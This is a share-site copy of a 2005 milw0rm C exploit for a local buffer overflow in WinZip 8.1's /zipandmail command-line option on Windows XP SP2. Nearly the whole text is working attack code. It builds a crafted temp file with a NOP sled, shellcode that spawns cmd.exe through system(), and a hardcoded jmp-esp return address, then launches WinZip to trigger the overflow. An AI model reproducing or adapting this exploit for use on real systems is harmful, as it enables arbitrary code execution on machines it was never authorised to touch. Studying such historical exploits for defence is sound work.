Docstoc

WinZIP 8.1 Command Line Local Buffer Overflow Exploit

Document Sample
WinZIP 8.1 Command Line Local Buffer Overflow Exploit Powered By Docstoc
					                           WinZIP 8.1 Command Line Local Buffer Overflow Exploit   Page 1/2
  1   /*
  2   *
  3   * WinZip Command Line Local Buffer Overflow
  4   * http://securitytracker.com/alerts/2004/Sep/1011132.html
  5   * http://www.winzip.com/wz90sr1.htm
  6   * Exploit coded By ATmaCA
  7   * Web: atmacasoft.com && spyinstructors.com
  8   * E−Mail: atmaca@icqmail.com
  9   * Credit to kozan
 10   *
 11   */
 12
 13   /*
 14   *
 15   * Tested with WinZip 8.1 on Win XP Sp2 En
 16   * Bug Fixed on WinZip 9.0 Service Release 1 (SR−1)
 17   * http://www.winzip.com/wz90sr1.htm
 18   *
 19   */
 20
 21   #include <windows.h>
 22   #include <stdio.h>
 23
 24   #define NOP 0x90
 25
 26   void main()
 27   {
 28           // create crafted command line
 29           char tmpfile[] = "c:\\wzs45.tmp";
 30           char winzippath[] = "C:\\Program Files\\WINZIP\\winzip32.exe";
 31           char zipandmailpar[] = " −* /zipandmail /@ ";
 32           char runpar[300];
 33           int i = 0;
 34           strcpy(runpar,winzippath);
 35           strcat(runpar,zipandmailpar);
 36           strcat(runpar,tmpfile);
 37
 38            // need for some input file name .tmp but not must to exist
 39            char inputfile[] = "C:\\someinputfile.ext\n";
 40
 41            // launch a local cmd.exe
 42            char shellcode[] =
 43            "\x55\x8B\xEC\x33\xFF"
 44            "\x57\x83\xEC\x04\xC6\x45\xF8"
 45            "\x63\xC6\x45\xF9\x6D\xC6\x45"
 46            "\xFA\x64\xC6\x45\xFB\x2E\xC6"
 47            "\x45\xFC\x65\xC6\x45\xFD\x78"
 48            "\xC6\x45\xFE\x65\xB8"
 49            "\xC7\x93\xC2\x77" //77C293C7 system() − WinXP SP2 − msvcrt.dll
 50            "\x50\x8D\x45\xF8\x50"
 51            "\xFF\x55\xF4";
 52

ATmaCA                                                                             06/07/2005
                         WinZIP 8.1 Command Line Local Buffer Overflow Exploit       Page 2/2
 53           // create crafted .tmp file
 54           FILE *di;
 55           if( (di=fopen(tmpfile,"wb")) == NULL ){
 56                   return;
 57           }
 58
 59           for(i=0;i<sizeof(inputfile)−1;i++)
 60                   fputc(inputfile[i],di);
 61
 62           fprintf(di,"c:\\");
 63
 64           for(i=0;i<384;i++)
 65                   fputc(NOP,di);
 66
 67
 68           for(i=0;i<sizeof(shellcode)−1;i++)
 69                   fputc(shellcode[i],di);
 70
 71           fprintf(di,"\xBF\xAC\xDA\x77"); //EIP − WinXp Sp2 Eng − jmp esp addr
 72           fprintf(di,"\x90\x90\x90\x90"); //NOPs
 73           fprintf(di,"\x90\x83\xEC\x74"); //sub esp,0x74
 74           fprintf(di,"\xFF\xE4\x90\x90"); //jmp esp
 75
 76           fprintf(di,"\n");
 77
 78           fclose(di);
 79           WinExec(runpar,SW_SHOW);
 80   }
 81
 82   // milw0rm.com [2005−06−07]




ATmaCA                                                                               06/07/2005

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:63
posted:5/23/2010
language:English
pages:2